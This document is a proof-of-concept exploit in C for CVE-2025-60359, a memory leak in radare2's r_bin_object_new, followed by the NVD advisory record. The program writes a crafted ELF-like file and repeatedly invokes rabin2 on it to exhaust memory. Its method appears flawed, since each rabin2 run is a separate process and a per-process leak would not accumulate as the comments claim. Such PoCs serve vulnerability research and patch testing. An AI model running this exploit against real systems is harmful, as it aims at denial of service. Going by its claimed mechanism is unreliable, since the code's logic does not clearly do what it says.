CVE-2025-60359

/* CVE-2025-60359 PoC - radare2 r_bin_object_new Memory Leak * This PoC triggers memory leak in r_bin_object_new function * by repeatedly processing crafted binary files with radare2 tools. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> /* Create a minimal malformed ELF-like binary to trigger r_bin_object_new */ int create_malformed_binary(const char *filename) { FILE *fp = fopen(filename, "wb"); if (!fp) return -1; /* Minimal ELF header with corrupted section info to trigger leak path */ unsigned char elf_header[] = { 0x7f, 0x45, 0x4c, 0x46, /* ELF magic */ 0x02, 0x01, 0x01, 0x00, /* 64-bit, little-endian */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, /* ET_EXEC, x86-64 */ 0x01, 0x00, 0x00, 0x00, /* version */ 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; fwrite(elf_header, 1, sizeof(elf_header), fp); /* Write corrupted section headers to trigger memory leak */ unsigned char corrupted_data[4096]; memset(corrupted_data, 0xff, sizeof(corrupted_data)); fwrite(corrupted_data, 1, sizeof(corrupted_data), fp); fclose(fp); return 0; } int main(int argc, char *argv[]) { const char *binary = "/tmp/malformed_target"; int iterations = (argc > 1) ? atoi(argv[1]) : 1000; printf("[+] CVE-2025-60359 PoC - radare2 Memory Leak\n"); printf("[+] Creating malformed binary: %s\n", binary); create_malformed_binary(binary); printf("[+] Triggering memory leak via %d iterations...\n", iterations); for (int i = 0; i < iterations; i++) { /* Use rabin2 to analyze the binary, triggering r_bin_object_new */ char cmd[256]; snprintf(cmd, sizeof(cmd), "rabin2 -I %s > /dev/null 2>&1", binary); system(cmd); if (i % 100 == 0) { printf("[*] Iteration %d/%d\n", i, iterations); } } printf("[+] Done. Check system memory usage to observe leak.\n"); return 0; }

{"cve": {"id": "CVE-2025-60359", "sourceIdentifier": "[email protected]", "published": "2025-10-17T14:15:46.953", "lastModified": "2025-10-23T12:34:03.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "radare2 v5.9.8 and before contains a memory leak in the function r_bin_object_new."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.9.8", "matchCriteriaId": "DD7ED9A8-17F8-4FD1-8D7F-EBBB728A07CD"}]}]}], "references": [{"url": "https://github.com/radareorg/radare2/pull/24215", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}